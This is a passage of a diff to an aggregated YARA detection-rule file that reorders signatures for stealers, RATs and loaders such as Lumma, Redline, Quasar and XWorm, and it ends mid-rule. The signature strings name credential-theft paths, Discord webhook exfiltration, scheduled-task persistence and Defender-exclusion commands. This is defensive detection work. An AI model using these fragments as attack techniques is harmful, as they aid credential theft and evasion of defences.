+		$o2 = {4f 00 70 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 65 00 72 00 61 00 20 00 4e 00 65 00 6f 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 6e 00}
+		$o3 = {4c 00 6f 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 67 00 69 00 6e 00 20 00 44 00 61 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 74 00 61 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( ( all of ( $s* ) ) or ( all of ( $o* ) ) )
 }
-rule EMBEERESEARCH_Win_Cobalt_Sleep_Encrypt : FILE
+rule EMBEERESEARCH_Win_Lumma_Update_Simple_Strings_Sep_2023 : FILE
 {
 	meta:
-		description = "Detects Sleep Encryption Logic Found in Cobalt Strike Deployments"
+		description = ""
 		author = "Matthew @ Embee_Research"
-		id = "6bd6fbb4-6634-5b51-90f0-f24e48d69043"
-		date = "2023-08-27"
-		modified = "2023-10-18"
+		id = "90209fc6-fd50-5b55-a400-112b2f207885"
+		date = "2023-09-13"
+		modified = "2023-09-21"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_sleep_encrypt_aug_2023.yar#L1-L55"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_lumma_updated_sep_2023.yar#L1-L25"
 		license_url = "N/A"
-		hash = "26b2f12906c3590c8272b80358867944fd86b9f2cc21ee6f76f023db812e5bb1"
-		logic_hash = "7aa2674ecaaae819c3f26924fa0622df322b1214493f37b1bdf5e00ba5ee98e6"
+		hash = "898a2bdbbb33ccd63b038c67d217554a668a52e9642874bd0f57e08153e6e5be"
+		logic_hash = "61571057a5a9c114b6ed5b94b922f2b389406a05e705b3e9e6ddbee221f74c92"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$r1_nokey = {4E 8B 04 08 B8 ?? ?? ?? ?? 41 F7 E3 41 8B C3 C1 EA 02 41 FF C3 6B D2 0D 2B C2 8A 4C 18 18 41 30 0C 38 48 8B 43 10 41 8B FB 4A 3B 7C 08 08}
-		$r2_nokey = {49 8B F9 4C 8B 03 B8 ?? ?? ?? ?? 41 F7 E1 41 8B C1 C1 EA 02 41 FF C1 6B D2 0D 2B C2 8A 4C 18 18 42 30 0C 07 48 FF C7 45 3B CB}
+		$s1 = "Do you want to run a malware ?" wide
+		$s2 = "c2sock" wide
+		$s3 = "TeslaBrowser/5" wide
+		$s4 = "Crypt build to disable this message" wide
 
 	condition:
-		($r1_nokey or $r2_nokey )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( all of ( $s* ) )
 }
-rule EMBEERESEARCH_Win_Redline_Updated_Bytecodes_Oct_2023
+rule EMBEERESEARCH_Win_Redline_Loader_Dec_2023
 {
 	meta:
-		description = "Configuration related bytecodes in redline .net files"
+		description = "Patterns observed in redline loader"
 		author = "Matthew @ Embee_Research"
-		id = "1e4470cf-fad3-57e5-8a95-deb97e98dbdc"
-		date = "2023-10-11"
-		modified = "2023-10-11"
+		id = "59d933a8-8ccd-565f-b379-e0bf6c3d3111"
+		date = "2023-12-24"
+		modified = "2023-12-29"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_oct_2023.yar#L2-L35"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_loader_dec_2023.yar#L1-L20"
 		license_url = "N/A"
-		hash = "0cc3a0f8b48ef8d8562b9cdf9c7cfe7f63faf43a5ac6dc6973dc8bf13b6c88cf"
-		logic_hash = "77273ba3736baf2c197fb8b17de1e22ba8f2380f73f9114f324ef56bfa508654"
+		hash = ""
+		logic_hash = "831c32f9998b97f7ceeb14df73a264a998df5f8800aaa5271755aaaeac070010"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s_1 = {
-				20 ?? ?? ?? ?? 											// ldc.i4
-				2B 00       											// br.s
-				28 ?? ?? ?? 2B 											// Call
-				80 ?? ?? ?? 04 											// stsfld
-				(20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70)   // ldc.i4, br.s, call OR ldstr
-				80 ?? ?? ?? 04      									// Call
-				(20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70)   // ldc.i4, br.s, call OR ldstr
-				80 ?? ?? ?? 04 											// Call		
-				20 ?? ?? ?? ?? 											// ldc.i4
-				2B00            										// br.s
-				28 ?? ?? ?? 2B      									// Call
-				80 ?? ?? ?? 04 											// stsfld
-				2A 														// ret
-			}
-		$s_2 = "mscoree.dll"
+		$s1 = {8b ?? ?? 0c 30 04 31 46 3b f7 7c ?? 5d 5b 5e 83 ?? ?? 75}
+		$s2 = "WritePrivateProfileStringA"
+		$s3 = "SetFileShortNameA"
+		$s4 = "- Attempt to use MSIL code from this assembly during native code initialization"
 
 	condition:
-		$s_1 and $s_2
+		all of them
 }
-rule EMBEERESEARCH_Win_Medusa_Bytecodes
+
+rule EMBEERESEARCH_Win_Njrat_Bytecodes_Oct_2023
 {
 	meta:
-		description = "Medusa Bytecodes"
+		description = ""
 		author = "Matthew @ Embee_Research"
-		id = "48b659f8-cd26-540a-89b6-6349f8d21e8f"
-		date = "2023-08-27"
-		modified = "2024-03-03"
+		id = "9e39587a-e878-5f99-806f-e9964952f0ac"
+		date = "2023-10-03"
+		modified = "2023-10-03"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_medusa_dotnet_bytecodes.yar#L1-L17"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_bytecodes_oct_2023.yar#L3-L22"
 		license_url = "N/A"
-		hash = "a1211549b4e1a7befd953d03b4d929b3dc9f25ec6c1bc9c05ae92a0ec08fb77c"
-		logic_hash = "aa01afd6981af99625a9fca93e512cc00931aca18e55c5cb6dee11efb9ea2968"
+		hash = "59d6e2958780d15131c102a93fefce6e388e81da7dc78d9c230aeb6cab7e3474"
+		hash = "4c56ade4409add1d78eac3b202a9fbd6afbd71878c31f798026082467ace2628"
+		hash = "d5a78790a1b388145424327e78f019584466d30d2d450bba832c0128aa3cd274"
+		logic_hash = "7df39219e2f2da55e461b1536e92ab125d488a048e41daaaa1fb9516be395d10"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = {1F ?? 8D ?? ?? ?? 01 25 16 72 ?? ?? ?? 70 A2 25 17 72 ?? ?? ?? 70 28 ?? ?? ?? 0A A2 25 18 20 ?? ?? ?? 00 13 04 12 04 28 ?? ?? ?? 0A A2 25 19 20 ?? ?? ?? 00 13 ?? 12 }
-		$s2 = "\\Medusa\\obj\\Release\\Medusa.pdb" ascii
+		$s1 = {14 80 ?? ?? ?? ?? 16 80 ?? ?? ?? ?? 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 14 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 14 80 ?? ?? ?? ?? 2A }
 
 	condition:
-		$s1 or $s2
+		dotnet.is_dotnet and $s1
 }
-rule EMBEERESEARCH_Win_Berbew_Strings_Dec_2023
+rule EMBEERESEARCH_Win_Marsstealer_Encryption_Bytecodes
 {
 	meta:
-		description = "Strings observed in Berbew malware."
+		description = "Encryption observed in MarsStealer"
 		author = "Matthew @ Embee_Research"
-		id = "402711af-c543-5c95-ae9e-e663825b6653"
+		id = "7a66ea9c-966e-5780-8b36-a268904b9c1b"
 		date = "2023-12-24"
-		modified = "2023-12-26"
+		modified = "2023-12-24"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_berbew_strings_dec_2023.yar#L1-L19"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_marsStealer_encryption_bytecodes_dec_2023.yar#L1-L16"
 		license_url = "N/A"
-		hash = "24dc0af3c51118697df999d8bffcdfc9cbf0d07f2630473450dd826a1ae4b9ae"
-		logic_hash = "a7f687e749ec69961777063d52678461a8e288c80037fac051d7b1a5b568d9e8"
+		hash = "7a391340b6677f74bcf896b5cc16a470543e2a384049df47949038df5e770df1"
+		logic_hash = "49ffde28c8823c00959ddbaa516fc48c7908b533c8f91608b0e3a645045c9048"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = "This KEWL STUFF was coded by V. V. PUPKIN"
-		$s2 = "REAL CASH, REAL BITCHEZ"
-		$s3 = "Please, enter your Card Number"
+		$s1 = {31 2d 3d 31 73 30 02 39 c0 74 0a 5b 70 61 73 64 6c 30 71 77 69 8d 5b 01 8d 52 01 39 eb 75 03 83 eb 20 39 ca}
 
 	condition:
-		all of them
+		$s1
 }
-rule EMBEERESEARCH_Win_Lumma_Simple_Strings : FILE
+rule EMBEERESEARCH_Win_Redline_Bytecodes_Jan_2024 : FILE
 {
 	meta:
-		description = ""
+		description = "Bytecodes found in late 2023 Redline malware"
 		author = "Matthew @ Embee_Research"
-		id = "d949d547-a2ee-56d9-8510-74f3b718b2c0"
-		date = "2023-09-13"
-		modified = "2023-09-21"
+		id = "8acf0fbb-f7d1-5a3d-9ccb-ee21926d6a31"
+		date = "2023-08-27"
+		modified = "2024-01-02"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_lumma _simple_sep_2023.yar#L1-L40"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_jan_2024.yar#L1-L22"
 		license_url = "N/A"
-		hash = "277d7f450268aeb4e7fe942f70a9df63aa429d703e9400370f0621a438e918bf"
-		logic_hash = "0b3cb6721d26b79afe892b1c4df5e54c18cd7a5492aeacd442deca6b9b926f3c"
+		hash = "ea1271c032046d482ed94c6d2c2c6e3ede9bea57dff13156cabca42b24fb9332"
+		logic_hash = "43f4d718611c16983071587c2806f92550ebba6bae737c59c63cd8584a5cc01f"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Binedx765ance Chaedx765in Waledx765let" wide
-		$s2 = "%appdaedx765ta%\\Moedx765zilla\\Firedx765efox\\Profedx765iles"
-		$s3 = "\\Locedx765al Extensedx765ion Settinedx765gs\\"
-		$s4 = "%appdedx765ata%\\Opedx765era Softwedx765are\\Opedx765era GX Staedx765ble"
-		$o1 = {57 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 65 00 62 00 20 00 44 00 61 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 74 00 61 00}
-		$o2 = {4f 00 70 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 65 00 72 00 61 00 20 00 4e 00 65 00 6f 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 6e 00}
-		$o3 = {4c 00 6f 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 67 00 69 00 6e 00 20 00 44 00 61 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 74 00 61 00}
+		$s1 = {00 00 7E ?? ?? ?? 04 7E ?? ?? ?? 04 28 ?? ?? ?? 06 17 8D ?? ?? ?? 01 25 16 1F 7C 9D 6F ?? ?? ?? 0A 13 ?? 16 13 ?? 38 }
+		$s2 = "mscoree.dll" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( ( all of ( $s* ) ) or ( all of ( $o* ) ) )
+		$s1 and $s2 and uint16( 0 ) == 0x5a4d
 }
-rule EMBEERESEARCH_Win_Ursnif_Patterns_Oct_2022
+rule EMBEERESEARCH_Win_Solarmarker_Stage2_Bytecodes_Dec_2023
 {
 	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
-		author = "Embee_Research @ Huntress"
-		id = "2c8da2b7-63f2-5cce-86ab-8a88f50d0263"
-		date = "2022-10-14"
-		modified = "2023-06-14"
+		description = "Patterns observed in Solarmarker stage2 dll"
+		author = "Matthew @ Embee_Research"
+		id = "9aba6cdf-1491-579d-b4a7-fe229272015d"
+		date = "2023-12-28"
+		modified = "2023-12-28"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_ursnif_patterns_oct_2022.yar#L1-L14"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_stage2_bytecodes_dec_2023.yar#L1-L20"
 		license_url = "N/A"
-		logic_hash = "241804ea3b7ac98071c533d9a98a45cdd0f7043f11994327c1f79e29f5fdce2c"
+		hash = "4a3b60496a793ee96a51fecf8690ef8312429a6b54d32f2a4424395c47b47fc8"
+		hash = "e0b2457491a8c2d50710aa343ad1957a76f83ceaf680165ffa0e287fe18abbd6"
+		logic_hash = "8e50e5942f0029ffda1d9750f8cc8e004a2512e50b6a14c1619ae0b83477a944"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$ursnif = {41 c1 e8 02 45 33 d2 45 8b d9 45 85 c0 74 2f 48 2b ca 83 7c 24 28 00 8b 04 11 44 8b c8 74 0a 85 c0 75 06 44 8d 40 01}
-		$script = "65,193,232,2,69,51,210,69,139,217,69,133,192,116,47,72,43,202,131,124,36,40,0,139,4,17,68,139,200,116,10,133,192,117,6,68,141,64,1"
+		$s1 = {6F ?? ?? 00 0A 1F 20 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 09 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0D 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A }
 
 	condition:
-		any of them
+		$s1
 }
-
-rule EMBEERESEARCH_Win_Exela_Stealer_Simple_Strings_Sep_2023
+rule EMBEERESEARCH_Win_Berbew_Strings_Dec_2023
 {
 	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
-		author = "Matthew @embee_research"
-		id = "e63aa1d3-997e-5200-93fc-869c177fe1a8"
-		date = "2023-09-24"
-		modified = "2023-09-26"
+		description = "Strings observed in Berbew malware."
+		author = "Matthew @ Embee_Research"
+		id = "402711af-c543-5c95-ae9e-e663825b6653"
+		date = "2023-12-24"
+		modified = "2023-12-26"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_exela_stealer_simple_strings_sep_2023.yar#L4-L32"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_berbew_strings_dec_2023.yar#L1-L19"
 		license_url = "N/A"
-		hash = "bf5d70ca2faf355d86f4b40b58032f21e99c3944b1c5e199b9bb728258a95c1b"
-		logic_hash = "2312b63fe86fd34eb12f42f079f470eb3af27ef8c199f3620253c828ad28441a"
+		hash = "24dc0af3c51118697df999d8bffcdfc9cbf0d07f2630473450dd826a1ae4b9ae"
+		logic_hash = "a7f687e749ec69961777063d52678461a8e288c80037fac051d7b1a5b568d9e8"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = "https://i.instagram.com/api/v1/accounts/current_user/" wide
-		$s2 = "/create /f /sc onlogon /rl highest /tn \"AutoUpdateCheckerOnLogon\" /tr " wide
-		$s4 = "https://discord.com/api/webhooks/" wide
-		$s5 = "Browser : {0} | Name : {1} | Value : {2} | Date created (timestamp) : {3} |  Date last used (timestamp) : {4} | Count {5}" wide
-		$s6 = "Browser : {0} | {1} {2}/{3} {4}" wide
-		$e1 = "Exela.Program" wide ascii
-		$e2 = "Exela.Wifi" wide ascii
-		$e3 = "Exela.Components" wide ascii
-		$e4 = "Exela Stealer" wide ascii
-		$e5 = "Exela.exe" wide ascii
+		$s1 = "This KEWL STUFF was coded by V. V. PUPKIN"
+		$s2 = "REAL CASH, REAL BITCHEZ"
+		$s3 = "Please, enter your Card Number"
 
 	condition:
-		dotnet.is_dotnet and ( ( all of ( $s* ) ) or ( 3 of ( $e* ) ) )
+		all of them
 }
-rule EMBEERESEARCH_Win_Cobalt_Strike_Loader_Shellcode_Jun_2023 : FILE
+rule EMBEERESEARCH_Win_Darkgate_Xllloader_Oct_2023
 {
 	meta:
-		description = "Detection of an encoder observed with Cobalt Strike shellcode"
-		author = "Matthew @ Embee_research"
-		id = "ea52b9e7-f2bd-5c9f-9ee1-506baa48be84"
-		date = "2023-07-03"
-		modified = "2023-07-03"
+		description = "Detects XLL Files Related to DarkGate"
+		author = "Matthew @ Embee_Research"
+		id = "4b5d9a2d-90ee-5452-83be-1677e1888045"
+		date = "2023-10-03"
+		modified = "2023-10-04"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_shellcode_encoder_jun_2023.yar#L1-L21"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_darkgate_xll_loader_oct_2023.yar#L2-L23"
 		license_url = "N/A"
-		logic_hash = "42b4b9ab681f3164168de84e76bcd8161865fa9e5871d70a6de534b23896e4f0"
+		hash = "091b7c16791cf976e684fe22ee18a4099a4e26ec75fa145b85dd14603b466b00"
+		hash = "305de78353b0d599cd40a73c7e639df7f5946d1fc36691c8f7798a99ee6835e7"
+		hash = "98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f"
+		hash = "27ec297e1fc34e29963303782ff881e74f8bd4126f4c5be0c4754f745d85f79a"
+		hash = "392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23"
+		hash = "9a34b32d0a66dd4f59aeea82ef48f335913c47c6ca901ab109df702cd166892f"
+		logic_hash = "ea9a166550c53225b0a06e2cd86760f63aed8973e889a457470bdba3d87ce6af"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		vendor = ""
+		tags = ""
 
 	strings:
-		$get_enc_offset = {8b 88 c0 00 00 00 8b 90 c4 00 00 00 48 8d b0 c8 00 00 00}
-		$decode_loop = {ac 83 e1 03 d2 c8 ff c1 aa ff ca 75 f3}
-		$b64_initial_bytes = "SInISIlMJAiLiMAAAACLkMQAAABIjbDIAAAA" wide ascii
+		$s1 = "xlAutoOpen" wide ascii
+		$s2 = { 49 ?? ?? 4c ?? ?? 48 ?? ?? 48 ?? ?? 02 e8 ?? ?? ?? ?? 48 ?? ?? 31 ?? 48 ?? ?? 01 48 ?? ?? 41 ?? ?? ?? ?? 30 ?? 48 ?? ?? 01 49 ?? ?? 75 ?? }
 
 	condition:
-		(( $get_enc_offset and $decode_loop ) or $b64_initial_bytes ) and filesize < 10000KB
+		( all of ( $s* ) )
 }
-
-rule EMBEERESEARCH_Win_Xworm_Simple_Strings
+rule EMBEERESEARCH_Win_Pikabot_Loader_Bytecodes_Oct_2023
 {
 	meta:
-		description = "Detects simple strings present in unobfuscated xworm"
+		description = "Detects bytecodes in recent PikaBot Loaders"
 		author = "Matthew @ Embee_Research"
-		id = "8d5d8f07-72fa-596b-a3fc-1dee4b7fd058"
-		date = "2023-08-30"
-		modified = "2023-10-18"
+		id = "c15b9390-1d20-5325-81c3-c6cf59ffb21f"
+		date = "2023-10-03"
+		modified = "2023-10-08"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_xworm_simple_strings_sep_2023.yar#L3-L29"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_pikabot_loader_bytecodes_oct_2023.yar#L3-L24"
 		license_url = "N/A"
-		hash = "4459d95c0493d640ecc9453cf6a4f2b7538b1a7b95032f70803fc726b8e40422"
-		hash = "820bb1a31f421b90ea51efc3e71cc720c8c2784fb1e882e732e8fafb8631a389"
-		logic_hash = "f7df310b24b2078249cdb670ece71ebe30f985c92b3e44b6dcf0e37405a26bc3"
+		hash = "778b6797bb9c9d2f868d3faaaf6b36ce3f06178c133bb592c5345c95ffb034a9"
+		hash = "e26d44d740b4edbd37fa6196dcc9171e49e711d8ce64f67aae36c4299e352108"
+		hash = "2d212cacc4767ef4383bdf462a9bb8aaf87f0b3c55b4c2f4a47c97c710ec1cd8"
+		logic_hash = "a078df39fda5ab6f432c4bf42fb61bdf106386d9684188189e3cea81803b3952"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$x1 = "XWorm V" wide nocase
-		$s1 = "/create /f /RL HIGHEST /sc minute /mo 1 /tn " wide
-		$s2 = "/create /f /sc minute /mo 1 /tn " wide
-		$s3 = "-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath " wide
+		$s1 = { 8b 59 64 a1 58 00 ?? ?? 8b 8e d0 00 00 00 2b c1 2d d9 f1 3e 41 0f af da 09 46 20 a1 34 dd ?? ?? 8b d3 2b 88 a0 00 00 00 2b 0d bc ff ?? ?? 81}
+		$s2 = { 88 14 08 8b cb 8b 15 a0 6a ?? ?? 42 c1 e9 08 89 15 a0 6a ?? ?? 8b 46 20 2b 05 ec 6a ?? ?? 05 ae 49 08 00}
+		$s3 = { 03 d8 43 a1 d4 8e ?? ?? 33 18 89 1d 18 8f ?? ?? a1 d4 8e ?? ?? 8b 15 18 8f ?? ?? 89 10 8b 45 f8 83 c0 04 89 45 f8 33 c0 a3 14 8f ?? ?? a1 d4 8e ?? ?? 83 c0 04 03 05 14 8f ?? ?? a3 d4 8e ?? ?? 8b 45 f8 3b 05 e0 8e ?? ?? }
 
 	condition:
-		dotnet.is_dotnet and $x1 and ( 2 of ( $s* ) )
+		$s1 or $s2 or $s3
 }
 rule EMBEERESEARCH_Win_Mystic_Stealer_Bytecodes_Sep_2023
 {
@@ -163590,31 +163991,56 @@ rule EMBEERESEARCH_Win_Mystic_Stealer_Bytecodes_Sep_2023
 	condition:
 		( all of them )
 }
-rule EMBEERESEARCH_Win_Darkgate_Xllloader_Oct_2023
+
+rule EMBEERESEARCH_Win_Quasar_Rat_Client : FILE
 {
 	meta:
-		description = "Detects XLL Files Related to DarkGate"
+		description = "Detects strings present in Quasar Rat Samples."
 		author = "Matthew @ Embee_Research"
-		id = "4b5d9a2d-90ee-5452-83be-1677e1888045"
-		date = "2023-10-03"
-		modified = "2023-10-04"
+		id = "7fc0bd6d-e187-51b7-a8b8-68b17271cef8"
+		date = "2023-08-27"
+		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_darkgate_xll_loader_oct_2023.yar#L2-L23"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_quasar_rat_client_aug_2023.yar#L3-L37"
 		license_url = "N/A"
-		hash = "091b7c16791cf976e684fe22ee18a4099a4e26ec75fa145b85dd14603b466b00"
-		hash = "305de78353b0d599cd40a73c7e639df7f5946d1fc36691c8f7798a99ee6835e7"
-		hash = "98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f"
-		hash = "27ec297e1fc34e29963303782ff881e74f8bd4126f4c5be0c4754f745d85f79a"
-		hash = "392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23"
-		hash = "9a34b32d0a66dd4f59aeea82ef48f335913c47c6ca901ab109df702cd166892f"
-		logic_hash = "ea9a166550c53225b0a06e2cd86760f63aed8973e889a457470bdba3d87ce6af"
+		hash = "914d88f295ac2213f37d3f71e6d4383979283d1728079a208f286effb44d840c"
+		hash = "45a724179ae1d08044c4bafb69c7f9cdb4ed35891dc9cf24aa664d75464ceb6d"
+		hash = "7e13bcd73232c3f33410aa95f61e1196a2f9ae35e05c1f9c8f251e07077a9dfb"
+		logic_hash = "efba911780ffb144f277e88ff8ca8f53a90c32a677ccb19ec26e71f974a1b91f"
+		score = 75
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$s1 = "Quasar Client" ascii wide
+		$s2 = "Quasar.Client.Properties.Resources" ascii wide
+		$s3 = "Google\\Chrome\\User Data\\Default\\" wide
+		$s4 = "\\Mozilla\\Firefox\\Profiles" wide
+		$s5 = "Yandex\\YandexBrowser\\User Data\\Default\\" wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and dotnet.is_dotnet and filesize < 7000KB and ( for any i in ( 0 .. dotnet.number_of_resources -1 ) : ( dotnet.resources [ i ] . name == "Quasar.Client*" ) or ( 3 of ( $s* ) ) )
+}
+rule EMBEERESEARCH_Win_Stealc_Bytecodes_Oct_2023
+{
+	meta:
+		description = "Bytecodes present in Stealc decoding routine"
+		author = "Matthew @ Embee_Research"
+		id = "ecac28a0-cd77-5e6a-8af2-59ea62e733bf"
+		date = "2023-08-27"
+		modified = "2023-10-09"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_stealc_bytecodes_oct_2023.yar#L2-L21"
+		license_url = "N/A"
+		hash = "74ff68245745b9d4cec9ef3c539d8da15295bdc70caa6fdb0632acdd9be4130a"
+		hash = "9f44a4cbc30e7a05d7eb00b531a9b3a4ada5d49ecf585b48892643a189358526"
+		logic_hash = "d50f57e32a7f513d92625549fcd139b7fa1e478879283fd61426fcd19d03d296"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = "xlAutoOpen" wide ascii
-		$s2 = { 49 ?? ?? 4c ?? ?? 48 ?? ?? 48 ?? ?? 02 e8 ?? ?? ?? ?? 48 ?? ?? 31 ?? 48 ?? ?? 01 48 ?? ?? 41 ?? ?? ?? ?? 30 ?? 48 ?? ?? 01 49 ?? ?? 75 ?? }
+		$s1 = {8b 4d f0 89 4d f8 8b 45 f8 c1 e0 03 33 d2 b9 06 00 00 00 f7 f1 8b e5 5d c2 04 00}
 
 	condition:
 		( all of ( $s* ) )
@@ -163647,32 +164073,196 @@ rule EMBEERESEARCH_Win_Cobaltstrike_Pipe_Strings_Nov_2023 : FILE
 	condition:
 		( all of ( $s* ) ) and filesize < 500KB
 }
-rule EMBEERESEARCH_Win_Pikabot_Loader_Bytecodes_Oct_2023
+
+rule EMBEERESEARCH_Win_Njrat_Bytecodes_V2_Oct_2023
 {
 	meta:
-		description = "Detects bytecodes in recent PikaBot Loaders"
+		description = ""
 		author = "Matthew @ Embee_Research"
-		id = "c15b9390-1d20-5325-81c3-c6cf59ffb21f"
+		id = "9090574e-7ad4-5207-af8b-7b56f2a1c917"
 		date = "2023-10-03"
 		modified = "2023-10-08"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_pikabot_loader_bytecodes_oct_2023.yar#L3-L24"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_bytecodes_v2_oct_2023.yar#L5-L27"
 		license_url = "N/A"
-		hash = "778b6797bb9c9d2f868d3faaaf6b36ce3f06178c133bb592c5345c95ffb034a9"
-		hash = "e26d44d740b4edbd37fa6196dcc9171e49e711d8ce64f67aae36c4299e352108"
-		hash = "2d212cacc4767ef4383bdf462a9bb8aaf87f0b3c55b4c2f4a47c97c710ec1cd8"
-		logic_hash = "a078df39fda5ab6f432c4bf42fb61bdf106386d9684188189e3cea81803b3952"
+		hash = "9877fc613035d533feda6adc6848e183bf8c8660de3a34b1acd73c75e62e2823"
+		hash = "40f07bdfb74e61fe7d7973bcd4167ffefcff2f8ba2ed6f82e9fcb5a295aaf113"
+		logic_hash = "0bdbf5715e3873d96c88a24ba08487af2b798d26cdcd3e35d783ce4828dae775"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
